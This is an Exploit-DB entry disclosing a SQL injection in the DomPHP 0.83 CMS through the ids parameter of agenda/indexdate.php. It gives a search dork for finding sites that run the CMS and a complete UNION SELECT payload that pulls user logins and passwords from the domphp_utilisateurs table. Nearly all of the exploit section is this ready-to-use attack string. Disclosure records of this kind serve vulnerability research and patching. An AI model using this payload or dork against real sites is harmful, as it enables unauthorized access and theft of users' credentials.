DomPHP 0.83 - SQL Injection

EDB-ID:

30872




Platform:

PHP

Date:

2014-01-13


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

-------------------------------------------------------------
DomPHP <= v0.83 SQL Injection Vulnerability 
-------------------------------------------------------------
 
= Author : Houssamix                       
= Script : DomPHP <= v0.83
                    
= Download : http://www.domphp.com/download/  
            
= BUG :  SQL Injection Vulnerability 
 
= DORK : Site créé à l'aide du CMS DomPHP v0.83 
 
= Exploit :                               
http://[target]/agenda/indexdate.php?ids=77 [SQL]
                 
Exemple : 				 

http://site.com/domphp/agenda/indexdate.php?ids=77 UNION SELECT 1,2,3,loginUtilisateur,5,6,passUtilisateur,8,9,10,11,12,13,14,15 from domphp_utilisateurs--